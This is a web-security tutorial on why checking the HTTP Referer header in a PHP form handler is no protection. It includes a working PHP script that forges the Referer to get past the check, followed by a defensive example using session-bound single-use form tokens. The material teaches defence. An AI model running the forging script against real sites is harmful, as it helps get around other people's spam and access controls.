How to bypass the REFERER security check


The http-Referer header is nothing more than the web address of the page that referred a browser to the current page.
If you are trying to "protect" a file by making sure that the http-referer value (or any other browser passed variable) is your own website, that check can be bypassed with the simple technique below. You cannot trust any browser passed variable.

Suppose you have a form that asks the user to enter a user name and a comment. The form sends the user input to, let's say, formprocess.php. In formprocess.php you check that the http-referer is your site to block spam comments:

$site = "example.com"; // placeholder: the post's own hostname was lost in extraction
if ( stripos( $_SERVER['HTTP_REFERER'] ?? '', $site ) !== false ) { // eregi() was removed in PHP 7; stripos() is the same case-insensitive substring search
    // do something
} else {
    echo "Nice try";
}

The problem here is that you are dealing with a browser passed variable. An attacker can easily bypass your check by sending your site as the Referer.

Look at this script:

// the site we want to attack (placeholder: the post's own hostname was lost in extraction)
$host = "example.com";
// the file we want to attack
$file = "formprocess.php";

// the form fields, URL-encoded (constructed sample; exactly 33 bytes, matching the Content-Length the post used)
$body = "username=test&comment=hello+world";

// construct a header for our request
$hdrs = array( 'http' => array(
    'method'  => "POST",
    'header'  => "accept-language: en\r\n" .
                 "Host: $host\r\n" .
                 "Referer: http://$host\r\n" . // Setting the http-referer
                 "Content-Type: application/x-www-form-urlencoded\r\n" .
                 "Content-Length: " . strlen($body) . "\r\n",
    'content' => $body
) );

// get the requested page from the server
// with our header as a request-header
$context = stream_context_create($hdrs);
$fp = fopen("http://" . $host . "/" . $file, 'r', false, $context);
if ($fp) {
    echo stream_get_contents($fp); // the server's response: "Nice try" never appears
    fclose($fp);
}




Create a formprocess.php file and request it with this script; you will see that the if statement in formprocess.php is useless.
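Since the Referer comes from the client, the fix is to base the decision on something the server issued and still holds. The script below is an added example, not code from the original post: it puts the post's Referer check next to a session-bound, single-use form token that is compared in constant time, and runs both against a constructed spoofed request and a constructed real visitor. The function names, the example.com host and the in-memory session arrays are assumptions made for the demonstration; in a real handler the arrays would be $_SESSION (after session_start()), $_SERVER and $_POST, and the token would travel in a hidden form field.

```php
<?php
// Added example (not the original post's code). Names, host and the
// array-based "session" are assumptions so this runs from the command line.
declare(strict_types=1);

// The check from the post: trusts a header the client can set to anything.
function acceptedByRefererCheck(array $server, string $site): bool
{
    $referer = $server['HTTP_REFERER'] ?? '';
    return stripos($referer, $site) !== false;
}

// Called when the form is rendered: mint a random token and remember it server-side.
function issueFormToken(array &$session): string
{
    $token = bin2hex(random_bytes(32));
    $session['form_token']        = $token;
    $session['form_token_issued'] = time();
    return $token;
}

// Called on submit: the token must exist, be fresh, match in constant time,
// and it is consumed whatever the outcome so it cannot be replayed.
function acceptedByTokenCheck(array &$session, array $post, int $maxAge = 900): bool
{
    $expected = $session['form_token'] ?? null;
    $issued   = (int) ($session['form_token_issued'] ?? 0);
    $provided = $post['form_token'] ?? '';
    unset($session['form_token'], $session['form_token_issued']);

    if (!is_string($expected) || $expected === '' || !is_string($provided)) {
        return false;
    }
    if (time() - $issued > $maxAge) {
        return false; // stale token: treat like no token at all
    }
    return hash_equals($expected, $provided);
}

// --- constructed demonstration ---
$site = 'example.com'; // placeholder host

// A scripted client like the one in the post: spoofed Referer, never loaded the form.
$spoofedServer = ['HTTP_REFERER' => "http://$site"];
$spoofedPost   = ['username' => 'bot', 'comment' => 'spam'];
$noSession     = [];

// A visitor who loaded the form first and therefore holds a token.
$session   = [];
$token     = issueFormToken($session);
$legitPost = ['username' => 'alice', 'comment' => 'hello', 'form_token' => $token];

$show = fn(bool $ok): string => $ok ? 'accepted' : 'rejected';
printf("Referer check, spoofed request: %s\n", $show(acceptedByRefererCheck($spoofedServer, $site))); // accepted
printf("Token check, spoofed request:   %s\n", $show(acceptedByTokenCheck($noSession, $spoofedPost))); // rejected
printf("Token check, real visitor:      %s\n", $show(acceptedByTokenCheck($session, $legitPost)));     // accepted
printf("Token check, replayed token:    %s\n", $show(acceptedByTokenCheck($session, $legitPost)));     // rejected
```

Run it with `php referer_vs_token.php`. The token check refuses the spoofed request not because of anything in the request headers but because the server has no record of handing that client a token. Note the honest limit: a bot that first fetches the form will receive a token like anyone else, so for spam specifically the token should sit beside rate limiting or a challenge; what it reliably stops is cross-site request forgery and any reliance on client-controlled headers for the decision.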
2010 WEBSITE20. All rights reserved.